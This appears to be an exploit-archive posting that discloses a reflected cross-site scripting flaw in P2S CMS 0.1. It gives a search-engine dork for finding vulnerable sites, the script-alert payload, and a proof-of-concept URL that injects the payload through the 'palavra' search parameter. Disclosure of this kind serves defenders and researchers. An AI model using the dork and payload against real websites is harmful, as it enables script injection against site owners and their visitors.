P2S CMS 0.1 Cross Site Scripting

P2S CMS 0.1 Cross Site Scripting

Posted Jun 9, 2023

Authored by indoushka

P2S CMS version 0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 7bb6a5d8c0fb7077e0992b71833738c252f38ebb48abe398cde8f60022fba24c

Download | Favorite | View

P2S CMS 0.1 Cross Site Scripting

====================================================================================================================================| # Title     : P2s-cms v0.1 XSS Vulnerability                                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit)                                               | | # Vendor    : https://www.primestart.net/                                                                                        || # Dork      : index.php?page=busca&palavra=                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  Use Payload : <script>alert(/indoushka/);</script>[+]  http://127.0.0.1/avamcombr/index.php?page=busca&palavra=%3Cscript%3Ealert(/indoushka/);%3C/script%3E        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

File Tags

• ActiveX (932)
• Advisory (81,354)
• Arbitrary (16,067)
• BBS (2,859)
• Bypass (1,694)
• CGI (1,024)
• Code Execution (7,157)
• Conference (678)
• Cracker (841)
• CSRF (3,317)
• DoS (23,189)
• Encryption (2,363)
• Exploit (51,175)
• File Inclusion (4,195)
• File Upload (955)
• Firewall (821)
• Info Disclosure (2,720)
• Intrusion Detection (884)
• Java (3,002)
• JavaScript (841)
• Kernel (6,577)
• Local (14,393)
• Magazine (586)
• Overflow (12,614)
• Perl (1,423)
• PHP (5,124)
• Proof of Concept (2,302)
• Protocol (3,567)
• Python (1,509)
• Remote (30,515)
• Root (3,556)
• Rootkit (506)
• Ruby (609)
• Scanner (1,633)
• Security Tool (7,854)
• Shell (3,163)
• Shellcode (1,211)
• Sniffer (893)
• Spoof (2,189)
• SQL Injection (16,234)
• TCP (2,394)
• Trojan (687)
• UDP (884)
• Virus (664)
• Vulnerability (31,597)
• Web (9,571)
• Whitepaper (3,745)
• x86 (961)
• XSS (17,693)
• Other

File Archives

• June 2023
• May 2023
• April 2023
• March 2023
• February 2023
• January 2023
• December 2022
• November 2022
• October 2022
• September 2022
• August 2022
• July 2022
• Older

Systems

• AIX (428)
• Apple (1,979)
• BSD (373)
• CentOS (57)
• Cisco (1,920)
• Debian (6,758)
• Fedora (1,691)
• FreeBSD (1,244)
• Gentoo (4,321)
• HPUX (879)
• iOS (344)
• iPhone (108)
• IRIX (220)
• Juniper (67)
• Linux (45,866)
• Mac OS X (685)
• Mandriva (3,105)
• NetBSD (256)
• OpenBSD (482)
• RedHat (13,370)
• Slackware (941)
• Solaris (1,610)
• SUSE (1,444)
• Ubuntu (8,652)
• UNIX (9,246)
• UnixWare (186)
• Windows (6,557)
• Other